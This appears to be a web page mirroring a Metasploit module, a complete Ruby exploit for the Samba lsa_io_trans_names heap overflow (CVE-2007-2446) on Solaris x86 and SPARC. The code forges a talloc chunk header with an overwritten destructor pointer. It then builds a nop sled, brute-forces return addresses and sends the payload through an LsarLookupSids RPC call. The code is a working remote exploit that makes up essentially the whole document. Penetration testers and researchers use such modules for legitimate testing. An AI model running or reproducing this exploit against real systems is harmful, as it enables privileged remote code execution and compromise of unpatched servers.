Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/solaris/samba/lsa_transnames_heap.rb
19718 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::DCERPC

10
  include Msf::Exploit::Remote::SMB::Client

11
  include Msf::Exploit::Brute

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => 'Samba lsa_io_trans_names Heap Overflow',

18
        'Description' => %q{

19
          This module triggers a heap overflow in the LSA RPC service

20
          of the Samba daemon. This module uses the TALLOC chunk overwrite

21
          method (credit Ramon and Adriano), which only works with Samba

22
          versions 3.0.21-3.0.24. Additionally, this module will not work

23
          when the Samba "log level" parameter is higher than "2".

24
        },

25
        'Author' => [

26
          'Ramon de C Valle',

27
          'Adriano Lima <adriano[at]risesecurity.org>',

28
          'hdm'

29
        ],

30
        'License' => MSF_LICENSE,

31
        'References' => [

32
          ['CVE', '2007-2446'],

33
          ['OSVDB', '34699'],

34
        ],

35
        'Privileged' => true,

36
        'Payload' => {

37
          'Space' => 1024

38
        },

39
        'Platform' => 'solaris',

40
        'Targets' => [

41
          [

42
            'Solaris 8/9/10 x86 Samba 3.0.21-3.0.24',

43
            {

44
              'Platform' => 'solaris',

45
              'Arch' => [ ARCH_X86 ],

46
              'Nops' => 64 * 1024,

47
              'Bruteforce' =>

48
                {

49
                  'Start' => { 'Ret' => 0x082f2000 },

50
                  'Stop' => { 'Ret' => 0x084f2000 },

51
                  'Step' => 60 * 1024

52
                }

53
            }

54
          ],

55
          [

56
            'Solaris 8/9/10 SPARC Samba 3.0.21-3.0.24',

57
            {

58
              'Platform' => 'solaris',

59
              'Arch' => [ ARCH_SPARC ],

60
              'Nops' => 64 * 1024,

61
              'Bruteforce' =>

62
                {

63
                  'Start' => { 'Ret' => 0x00322000 },

64
                  'Stop' => { 'Ret' => 0x00722000 },

65
                  'Step' => 60 * 1024

66
                }

67
            }

68
          ],

69
          [

70
            'DEBUG',

71
            {

72
              'Platform' => 'solaris',

73
              'Arch' => [ ARCH_X86 ],

74
              'Nops' => 64 * 1024,

75
              'Bruteforce' =>

76
                {

77
                  'Start' => { 'Ret' => 0xaabbccdd },

78
                  'Stop' => { 'Ret' => 0xaabbccdd },

79
                  'Step' => 60 * 1024

80
                }

81
            }

82
          ],

83
        ],

84
        'DisclosureDate' => '2007-05-14',

85
        'DefaultTarget' => 0,

86
        'Notes' => {

87
          'Stability' => [CRASH_SERVICE_RESTARTS],

88
          'Reliability' => [REPEATABLE_SESSION],

89
          'SideEffects' => [IOC_IN_LOGS]

90
        }

91
      )

92
    )

93


94
    register_options([

95
      OptString.new('SMBPIPE', [true, 'The pipe name to use', 'LSARPC']),

96
    ])

97


98
    deregister_options('DCERPC::fake_bind_multi')

99
  end

100


101
  # Need to perform target detection

102
  def autofilter

103
    false

104
  end

105


106
  def brute_exploit(target_addrs)

107
    if !@nops

108
      if (target['Nops'] > 0)

109
        print_status('Creating nop sled....')

110
        @nops = make_nops(target['Nops'])

111
      else

112
        @nops = ''

113
      end

114
    end

115


116
    print_status('Trying to exploit Samba with address 0x%.8x...' % target_addrs['Ret'])

117


118
    nops = @nops

119
    pipe = datastore['SMBPIPE'].downcase

120


121
    print_status('Connecting to the SMB service...')

122
    connect

123
    smb_login

124


125
    datastore['DCERPC::fake_bind_multi'] = false

126


127
    handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', ["\\#{pipe}"])

128
    print_status("Binding to #{handle} ...")

129
    dcerpc_bind(handle)

130
    print_status("Bound to #{handle} ...")

131


132
    num_entries = 272

133
    num_entries2 = 288

134


135
    #

136
    # First talloc_chunk

137
    # 16 bits align

138
    # 16 bits sid_name_use

139
    #     16 bits uni_str_len

140
    #     16 bits uni_max_len

141
    #     32 bits buffer

142
    # 32 bits domain_idx

143
    #

144
    buf = (('A' * 16) * num_entries)

145


146
    # Padding

147
    buf << 'A' * 8

148


149
    # TALLOC_MAGIC

150
    talloc_magic = "\x70\xec\x14\xe8"

151


152
    # Second talloc_chunk header

153
    buf << 'A' * 8                         # next, prev

154
    buf << NDR.long(0) + NDR.long(0)       # parent, child

155
    buf << NDR.long(0)                     # refs

156
    buf << [target_addrs['Ret']].pack('V') # destructor

157
    buf << 'A' * 4                         # name

158
    buf << 'A' * 4                         # size

159
    buf << talloc_magic                    # flags

160


161
    stub = lsa_open_policy(dcerpc)

162


163
    stub << NDR.long(0)            # num_entries

164
    stub << NDR.long(0)            # ptr_sid_enum

165
    stub << NDR.long(num_entries)  # num_entries

166
    stub << NDR.long(0x20004)      # ptr_trans_names

167
    stub << NDR.long(num_entries2) # num_entries2

168
    stub << buf

169
    stub << nops

170
    stub << payload.encoded

171


172
    print_status('Calling the vulnerable function...')

173


174
    begin

175
      # LsarLookupSids

176
      dcerpc.call(0x0f, stub)

177
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse, Rex::Proto::SMB::Exceptions::NoReply, ::EOFError

178
      print_status('Server did not respond, this is expected')

179
    rescue Rex::Proto::DCERPC::Exceptions::Fault

180
      print_error('Server is most likely patched...')

181
    rescue StandardError => e

182
      if e.to_s =~ /STATUS_PIPE_DISCONNECTED/

183
        print_status('Server disconnected, this is expected')

184
      else

185
        print_error("Error: #{e.class}: #{e}")

186
      end

187
    end

188


189
    handler

190
    disconnect

191
  end

192


193
  def lsa_open_policy(dcerpc, server = '\\')

194
    stubdata =

195
      # Server

196
      NDR.uwstring(server) +

197
      # Object Attributes

198
      NDR.long(24) + # SIZE

199
      NDR.long(0) + # LSPTR

200
      NDR.long(0) + # NAME

201
      NDR.long(0) + # ATTRS

202
      NDR.long(0) + # SEC DES

203
      # LSA QOS PTR

204
      NDR.long(1) + # Referent

205
      NDR.long(12) + # Length

206
      NDR.long(2) + # Impersonation

207
      NDR.long(1) + # Context Tracking

208
      NDR.long(0) + # Effective Only

209
      # Access Mask

210
      NDR.long(0x02000000)

211


212
    dcerpc.call(6, stubdata)

213


214
    dcerpc.last_response.stub_data[0, 20]

215
  end

216
end

217


218